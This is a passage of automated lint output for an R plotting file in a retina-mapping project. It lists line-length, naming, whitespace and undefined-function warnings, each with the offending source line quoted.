\n                                                             ^\n```\n[R/plotting_functions.R:109:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                            ^\n```\n[R/plotting_functions.R:112:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:112:58:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                         ^\n```\n[R/plotting_functions.R:112:63:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                              ^\n```\n[R/plotting_functions.R:112:94:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                             ^\n```\n[R/plotting_functions.R:120:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L120) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote markup file to \", output_path, \"\\n Ensure that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:130:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L130) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param tear_coordinates_dataframe the dataframe of 3 columns, with c('V0','VB','VF'), and n columns, where n= number of tears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:131:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L131) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the T.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:135:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L135) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_tear_file <- function(tear_coordinates_dataframe, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:138:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L138) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write.table(tear_coordinates_dataframe, output_path, sep = \",\", row.names = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:139:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L139) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote tear file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:147:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L147) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the P.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:155:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L155) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote coordinates file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:59:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n                                                          ^~~~~~~~~~~\n```\n[R/plotting_functions.R:178:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Lines should not be more than 80 characters.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:178:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n                                                                                    ^\n```\n[R/plotting_functions.R:180:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:180:95:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n                                                                                              ^\n```\n[R/plotting_functions.R:195:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L195) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fields::image.plot(legend.only = TRUE, col = col, zlim = zlim, family = \"Palatino\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:202:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L202) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints a 4 element numeric vector describing the xy and x'y' for the line segment.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:206:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L206) *style:* **Lines should not be more than 80 characters.**\n```r\n​    segments(endpoints[1], endpoints[2], endpoints[3], endpoints[4], col = color_hex)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:216:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L216) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints vector of 4 numerics, x,y and x',y' defining the line segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:226:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L226) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description We do not need points plotted in the corners of the plotted circle.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Lines should not be more than 80 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Trailing whitespace is superfluous.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n                                                                                  ^\n```\n[R/plotting_functions.R:235:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L235) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    matrix_position_is_within_the_circle <- function() {\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:238:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L238) *style:* **Variable or function name should be snake_case.**\n```r\n​    markNA <- matrix(minitics, ncol = spatial_res, nrow = spatial_res)\n    ^~~~~~\n```\n[R/plotting_functions.R:246:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L246) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Find the location to put the label around the circle at each of the lines\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:46:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable or function name should be snake_case.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n                                             ^~~~~~~~~\n```\n[R/plotting_functions.R:252:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:252:14:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *warning:* **no visible global function definition for ‘RMat’, Did you mean 'hat'?**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n             ^~~~\n```\n[R/plotting_functions.R:261:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Lines should not be more than 80 characters.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:261:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Trailing whitespace is superfluous.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n                                                                                       ^\n```\n[R/plotting_functions.R:263:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L263) *warning:* **no visible global function definition for ‘draw_line_segments’**\n```r\n​    draw_line_segments(endpoints)\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:267:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L267) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description put a degree label at the ends of the endpoints for each longitude\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Lines should not be more than 80 characters.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:38:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n                                     ^~~~~~~~\n```\n[R/plotting_functions.R:275:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:275:108:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Trailing whitespace is superfluous.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n                                                                                                           ^\n```\n[R/plotting_functions.R:285:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L285) *style:* **Variable or function name should be snake_case.**\n```r\n​RMat <- function(radians) {\n^~~~\n```\n[R/plotting_functions.R:286:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L286) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(matrix(c(cos(radians), sin(radians), -sin(radians), cos(radians)), ncol = 2))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:290:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L290) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description plots radial lines, degree label for latitudes, and plots radial spokes with labels\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:295:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L295) *warning:* **no visible global function definition for ‘plot_circle_radial_lines’**\n```r\n​    plot_circle_radial_lines(radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:296:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L296) *warning:* **no visible global function definition for ‘plot_degree_label_for_latitudes’**\n```r\n​    plot_degree_label_for_latitudes(outer_radius, radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:297:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L297) *warning:* **no visible global function definition for ‘plot_radial_spokes_and_labels’**\n```r\n​    plot_radial_spokes_and_labels(outer_radius)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:71:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable or function name should be snake_case.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n                                                                      ^~~\n```\n[R/plotting_functions.R:329:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L329) *style:* **Lines should not be more than 80 characters.**\n```r\n​    } else if ((length(col_breaks_source) == 2) & (is.numeric(col_breaks_source))) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:346:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L346) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param extrapolate whether to predict out to the equator of the eye, even if no data exists nearby.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:347:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L347) *style:* **Lines should not be more than 80 characters.**\n```r\n​interpolate_input_data <- function(minitics, x, y, z, lambda, polynomial_m, extrapolate) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Lines should not be more than 80 characters.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Variable or function name should be snake_case.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:348:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Use <-, not =, for assignment.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n              ^\n```\n[R/plotting_functions.R:349:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *style:* **Lines should not be more than 80 characters.**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:349:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n         ^~~\n```\n[R/plotting_functions.R:350:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L350) *warning:* **no visible global function definition for ‘predictSurface’**\n```r\n​    tmp <- predictSurface(t, grid.list, extrap = extrapolate)\n           ^~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:351:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L351) *style:* **Variable or function name should be snake_case.**\n```r\n​    Mat <- tmp$z\n    ^~~\n```\n[R/plotting_functions.R:363:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Variable or function name should be snake_case.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:363:25:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                       ~^~\n```\n[R/plotting_functions.R:363:31:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                             ~^~\n```\n[R/plotting_functions.R:363:37:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                   ~^~\n```\n[R/plotting_functions.R:363:47:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                             ~^~\n```\n[R/plotting_functions.R:363:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                                       ~^~\n```\n[R/plotting_functions.R:364:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L364) *style:* **Variable or function name should be snake_case.**\n```r\n​    r.labs <- c(90, 60, 30, 0, 330, 300)\n    ^~~~~~\n```\n[R/plotting_functions.R:365:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    l.labs <- c(270, 240, 210, 180, 150, 120)\n    ^~~~~~\n```\n[R/plotting_functions.R:367:9:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L367) *warning:* **no visible global function definition for ‘plot_longitudinal_lines’**\n```r\n​        plot_longitudinal_lines(axis.rads[i], outer_radius)\n        ^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Lines should not be more than 80 characters.**\n```r\n​        plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Trailing whitespace is superfluous.**\n```r\n​        plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n                                                                                  ^\n```\n[R/plotting_functions.R:389:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L389) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Useful for making the falciform process look more smooth and refined. This is purely aesthetic.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:390:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L390) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @details enhance the resolution of a polygon vertices dataframe by creating a spline along each vertex.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:391:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L391) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy vertices in dataframe with x and y columns, in order (not all are 